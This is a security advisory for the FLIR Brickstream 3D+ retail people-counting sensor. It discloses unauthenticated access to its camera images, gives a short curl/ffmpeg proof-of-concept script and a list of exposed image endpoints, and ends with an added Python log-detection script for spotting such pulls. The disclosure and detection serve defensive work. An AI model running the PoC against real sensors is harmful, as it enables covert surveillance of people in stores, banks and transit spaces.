FLIR Brickstream 3D+ - RTSP Stream Disclosure
Source: https://www.zeroscience.mk  Author: LiquidWorm  Published: 2018-10-16
FLIR Systems FLIR Brickstream 3D+ Unauthenticated RTSP Stream Disclosure
 
 
Vendor: FLIR Systems, Inc.
Product web page: http://www.brickstream.com
Affected version: Firmware: 2.1.742.1842
                  Api: 1.0.0
                  Node: 0.10.33
                  Onvif: 0.1.1.47
 
Summary: The Brickstream line of sensors provides highly accurate, anonymous
information about how people move into, around, and out of physical places.
These smart devices are installed overhead inside retail stores, malls, banks,
stadiums, transportation terminals and other brick-and-mortar locations to
measure people's behaviors within the space.
 
Desc: The FLIR Brickstream 3D+ sensor is vulnerable to unauthenticated and
unauthorized live RTSP video stream access.
 
Tested on: Titan
           Api/1.0.0
 
 
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience
 
 
Advisory ID: ZSL-2018-5496
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5496.php
 
 
26.07.2018
 
--
 
 
#!/bin/bash
#
# PoC:
#
# Pulls ten consecutive snapshots from the sensor's image endpoint on
# port 8083 (no credentials are sent) and stitches them into a video.

echo 'Fetching some images...'
for x in {1..10}; do
    curl http://192.168.2.1:8083/middleImage.jpg -o sequence-$x.jpg -#
done
echo 'Done.'
sleep 2
echo 'Generating video...'
sleep 2
# One input frame per second, encoded with libx264 at 60 fps output.
ffmpeg -r 1 -i sequence-%01d.jpg -c:v libx264 -vf fps=60 -pix_fmt yuv444p counted_people.mp4
echo 'Running generated video...'
sleep 2
vlc counted_people.mp4

#
# Image endpoints exposed by the same service:
#
# http://192.168.2.1:8083/middleImage.jpg
# http://192.168.2.1:8083/rightimage.jpg
# http://192.168.2.1:8083/leftimage.jpg
# http://192.168.2.1:8083/threeDimage.jpg
# http://192.168.2.1:8083/startStopTrafficMapImage.jpg
# http://192.168.2.1:8083/dwellTrafficMapImage.jpg
# http://192.168.2.1:8083/heightTrafficMapImage.jpg
#
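The PoC above pulls still images from the sensor's HTTP service on port 8083 in a tight loop, which is exactly the shape a defender can look for in access logs. The following is an added detection example, not part of the advisory or of any FLIR software: it assumes the sensor's port 8083 service sits behind a reverse proxy that writes Combined Log Format lines, and that a short allowlist of management hosts is known. The log lines, the host addresses and the allowlist are constructed for illustration; the endpoint paths are the ones listed in the advisory.

```python
"""Flag unauthenticated and bulk pulls of Brickstream image endpoints in an access log.

Added example (not from the advisory). Assumes a proxy in front of port 8083
writes Combined Log Format; the sample log and the allowlist are constructed.
"""
import re
from collections import defaultdict
from datetime import datetime

# Image endpoints listed in the advisory (paths as served on port 8083).
SENSITIVE_PATHS = frozenset({
    "/middleImage.jpg", "/rightimage.jpg", "/leftimage.jpg", "/threeDimage.jpg",
    "/startStopTrafficMapImage.jpg", "/dwellTrafficMapImage.jpg",
    "/heightTrafficMapImage.jpg",
})

# Combined Log Format: host ident authuser [date] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)(?: [^"]*)?" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$'
)

# Constructed sample: one fetch from the assumed management host, then ten
# one-second-spaced snapshot pulls from an unexpected host (the PoC's loop),
# one unrelated request and one unparseable line.
SAMPLE_LOG = [
    '192.168.2.50 - - [16/Oct/2018:10:14:58 +0000] "GET /heightTrafficMapImage.jpg HTTP/1.1" 200 48213 "-" "Mozilla/5.0"',
] + [
    f'192.168.2.77 - - [16/Oct/2018:10:15:{s:02d} +0000] "GET /middleImage.jpg HTTP/1.1" 200 51200 "-" "curl/7.58.0"'
    for s in range(1, 11)
] + [
    '192.168.2.77 - - [16/Oct/2018:10:16:30 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "curl/7.58.0"',
    'garbage line that does not parse',
]
MANAGEMENT_HOSTS = frozenset({"192.168.2.50"})  # constructed allowlist


def parse_line(line):
    """Parse one Combined Log Format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    # Drop any query string so /middleImage.jpg?x=1 still matches the path set.
    rec["path"] = rec["path"].split("?", 1)[0]
    return rec


def sensitive_hits(lines):
    """Parsed records for successful GETs of the advisory's image endpoints."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "GET" and rec["status"] == 200 and rec["path"] in SENSITIVE_PATHS:
            hits.append(rec)
    return hits


def unauthenticated_access(lines, allowed_hosts):
    """Image fetches with no authenticated user ('-') from hosts outside the allowlist."""
    return [rec for rec in sensitive_hits(lines)
            if rec["user"] == "-" and rec["host"] not in allowed_hosts]


def bulk_capture(lines, threshold=5, window_seconds=30):
    """Hosts that pulled at least `threshold` images inside one sliding window.

    Returns {host: max_images_in_any_window}; the PoC's ten-image loop trips this.
    """
    by_host = defaultdict(list)
    for rec in sensitive_hits(lines):
        by_host[rec["host"]].append(rec["ts"])
    flagged = {}
    for host, stamps in by_host.items():
        stamps.sort()
        best, j = 0, 0
        for i in range(len(stamps)):
            # Advance j to the first timestamp outside the window that starts at i.
            while j < len(stamps) and (stamps[j] - stamps[i]).total_seconds() <= window_seconds:
                j += 1
            best = max(best, j - i)
        if best >= threshold:
            flagged[host] = best
    return flagged


if __name__ == "__main__":
    for rec in unauthenticated_access(SAMPLE_LOG, MANAGEMENT_HOSTS):
        print(f"unauthenticated image fetch: {rec['host']} {rec['path']} {rec['ts'].isoformat()}")
    for host, n in bulk_capture(SAMPLE_LOG).items():
        print(f"bulk capture: {host} pulled {n} images within 30s")
```

Because the device itself enforces no authentication, the `authuser` field is `-` on every line, so the first rule is only meaningful with a source allowlist; the second rule (many image fetches from one host in a short window) does not depend on the allowlist and is the more robust signal for the PoC's behaviour. The same two checks translate directly into a SIEM query over proxy logs.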
 